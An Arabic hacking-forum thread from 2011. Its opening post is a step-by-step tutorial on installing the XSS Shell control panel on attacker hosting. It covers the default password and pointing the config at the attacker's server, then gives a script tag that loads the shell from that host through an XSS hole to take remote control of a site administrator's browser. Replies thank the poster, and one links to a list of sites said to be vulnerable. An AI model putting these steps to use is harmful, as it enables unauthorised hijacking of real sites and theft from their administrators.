التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-01-2011, 10:30 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي XSS backdoor and zombie manager Really hell


السلام عليكم ورحمه الله وبركاته

اليوم رح نبدا حركه حلوه ورائعه دعم ثغرات xss بسكربت للتحكم اون لاين بالهدف ...!!!

الفكره بالدرس
انك تلقى ثغره xss وتهاجم بمستوى اعلى من مجرد تحصل ع الكوكز الخاص بالادمن
ويكون هذا التحكم بعيد كل البعد عن الاكواد المعقده وهاد يكون بكل بساطه من خلال سكربت
xss shell





طريقه التنصيب
أول شيء تحميل الفايلات من هون
http://labs.portcullis.co.uk/downloa...xsstunnell.zip

بعدين ارفع الفولدر ع ايا استضافه تدعم لغه asp لانه شغلك رح يكون ع شركه asp
(ينفع استخدام السيرفر الشخصي اذا كان مركب عليه ip ثابت ) << ام التعقيد :P

Install Admin Interface

بعد نفك الضغط نرفع هاد ع فولدر بموقعك
xssshell
وهذا الفولدر
db
رابط السكربت يصير كالتالي
http://[vbspiders]/xssshell/
بطلب باسورد والباس الافتراضي هو
w00t

طيب هيك السكربت خلصنا تنصيبه بس لسا ضايل لنا خطوه ثانيه

Configure XSS Shell for communication

نفتح هذا الفايل
xssshell.asp
ندور ع كلمه
SERVER
نغير الي قدامها لرابط السكربت
يعني المكان الي رفعت عليه الفايلات هاي والخرابيط
"http://[YOURHOST]/xssshell/";
مثلا انا رفعته ع vbspiders
بصير هيك
"http://[vbspiders]/xssshell/";

وهيك انت تمام التمام
بكون جهزت الهجوم وكل اشي

طيب نستغل ثغره
xss
بزي كود التحويل او ايا كود بحيث انك تسحب المسكين ادمن الموقع للصفحه
وهذا احد الاكواد
< s c r i p t src="http://[vbspiders]/xssshell.asp"> < / s c r i p t >
مع ازاله المسافات بين كلمه سكربت


مش رح اشرح كل اشي زي الصغار المفروض مستوانا اعلى من هيك بس عشان التنصيب شويه فيه غلبه
شرحته
والباقي من خيارات السكربت اكتشفوها وهي بسيطه كثير


يديو تتوريال (ديمو )
http://www.securitytube.net/video/1098



المصدر
http://labs.portcullis.co.uk/application/xssshell/

مع خالص دعواتكم لي بالتوفيق بدراستي

شكر خاص لاخوكم ALQAYSAR



XSS backdoor and zombie manager Really hell

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 11-02-2011, 12:08 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية speeedh
 

 

 
إحصائية العضو






speeedh غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
speeedh is on a distinguished road

افتراضي رد: XSS backdoor and zombie manager Really hell


بارك الله فيك اخي فعلا فكرة جهنمية

التوقيع

http://img21.xooimage.com/files/9/7/...st-16c600a.jpg

 

   

رد مع اقتباس
قديم 11-02-2011, 12:59 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو






سني هكر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
سني هكر is on a distinguished road

افتراضي رد: XSS backdoor and zombie manager Really hell


مشكور اخوي الف الشكر لك لاكن لاعرف اخترق باذن الله سوف اتعلم

   

رد مع اقتباس
قديم 11-02-2011, 01:04 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي رد: XSS backdoor and zombie manager Really hell


بارك الله اخي فيك !

الله يعطيك العافية معلومات قيمة جدا

كل ودي اخي

   

رد مع اقتباس
قديم 11-02-2011, 01:40 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي رد: XSS backdoor and zombie manager Really hell


الله يعطيك العافية عبود بارك الله فيك وفعلآ أفتقدنا مواضيعك الرائعة . تحياتي لك.

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 11-02-2011, 03:44 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: XSS backdoor and zombie manager Really hell


معليش على الرد مرة ثانية ولكن انا بصراحة تعبت مع الثغرة ههههههههههههههه

في مواقع مصابة في الثغرة يمكن تستفيدون منه

http://www.vbspiders.com/vb/t41693.html

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:10 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0